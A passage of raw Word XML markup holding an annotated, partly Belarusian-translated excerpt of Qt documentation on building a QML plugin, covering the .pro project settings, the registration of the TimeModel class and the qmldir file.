          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>гэта</w:t>
      </w:r>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>магчымасць</w:t>
      </w:r>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>дазваляе</w:t>
      </w:r>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>рэг</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">істраваць у адным месцы пачку С++ класаў, каб іх можна было выкарыстоўваць у </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This registers the</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TimeModel</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class with version</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1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of this plugin library, as a QML type called</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Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId329" w:anchor="Q_ASSERT" w:history="1">
        <w:r w:rsidRPr="00855D31">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_ASSERT</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() macro can ensure the type namespace is imported correctly by any QML components that use this plugin.</w:t>
      </w:r>
      <w:r w:rsidR="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00855D31" w:rsidRPr="00855D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu this sentence.</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId330" w:history="1">
        <w:r w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">Defining </w:t>
        </w:r>
        <w:r w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:lastRenderedPageBreak/>
          <w:t>QML Types from C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>article has more information about registering C++ types into the runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>project file (</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.pro</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) defines the project as a plugin library</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>specifies it should be built into the</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imports/TimeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory, and registers the plugin target name and various other details</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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TEMPLATE </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lib</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CONFIG </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qt plugin</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QT </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qml</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DESTDIR </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imports</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TimeExample</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TARGET </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qmlqtimeexampleplugin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SOURCES </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qexampleqmlplugin</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cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finally, a</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId331" w:history="1">
        <w:r w:rsidRPr="00877F4C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmldir file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is required in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imports/TimeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory to describe the plugin and the types that it exports</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The plugin includes a</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Clock.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file along with the</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qmlqtimeexampleplugin</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that is built by the project (as shown above in the</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.pro</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file) so both of these need to be specified in the</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qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:before="180" w:after="375"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module TimeExample</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Clock </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Clock</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plugin qmlqtimeexampleplugin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To make things easier for this example, the TimeExample source directory is in</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imports/TimeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we build</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId332" w:anchor="source-build-and-install-directories" w:history="1">
        <w:r w:rsidRPr="00877F4C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>in-source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. However, the structure of the source directory is not so important, as the</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qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file can specify paths to installed QML files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="007A24CD" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
